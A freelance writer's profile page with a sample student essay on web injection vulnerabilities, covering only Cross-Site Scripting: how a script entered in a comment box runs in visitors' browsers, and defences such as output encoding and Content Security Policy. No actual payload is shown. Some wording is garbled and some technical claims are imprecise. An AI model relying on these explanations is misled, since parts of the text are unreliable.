Ian Mutava Kioko
$10/hr
Research-driven writer, SEO, technical & non-technical writing, document preparation
- Reply rate:
- 75.0%
- Availability:
- Full-time (40 hrs/wk)
- Age:
- 20 years old
- Location:
- Nairobi, Nairobi, Kenya
- Experience:
- 4 years
Injection
Student name
Institution
Course
Instructor
Due date
Injection
Introduction
Web application injection vulnerabilities are vulnerabilities caused by the injection of user inputs into a program or application, usually via a form field. The following vulnerabilities remove the functionality and security prospects of web applications, damaging technologies like SQL, HTML, JavaScript and others. While they are known and entirely documented, injection attacks such as SQL Injection continue to pose a threat to organizations. Exploiting these vulnerabilities will give the attacker full access or selective control over the target systems. Several injection flaws are also possible within web applications, categorized based on different protocols and technologies; they respond to different ways of exploitation and shielding.
Cross-Site Scripting (XSS)
Protocol/Technology Affected:
Cross-Site Scripting (XSS) vulnerabilities are Web Application vulnerabilities which take advantage of the way browsers interpret scripts include in Web pages. These vulnerabilities are typical for web technologies like HTML, JavaScript, and other client-sided scripting languages.
Example of Exploit:
An attacker can use two common techniques when attacking a specific web application with an XSS vulnerability. For example, an attacker may enter the following text: into a comment box of a targeted website. If the input is not sanitized correctly, then it will display the comment with the script embedded and run that script on anyone's browser who opens that page of the website. This may result into events like session hijacking, change of tune in web pages and even acquireage of cookies from the web pages.
One Way to Defend Against Exploitation:
The best technique to prevent XSS attacks is input validation and encoding of output during execution of application programs. For instance, encoding user inputs in different ways by ascertaining that the input containing a script tag or any other code is stripped before rendering can be done safely using frameworks or libraries such as OWASP's AntiSamy or ESAPI. Also, the server can configure other security headers, such as Content Security Policy (CSP), to direct the browser not to run scripts.
Reference
OWASP Foundation. (2023). Cross-Site Scripting (XSS). Retrieved from https://owasp.org/www-community/attacks/xss/
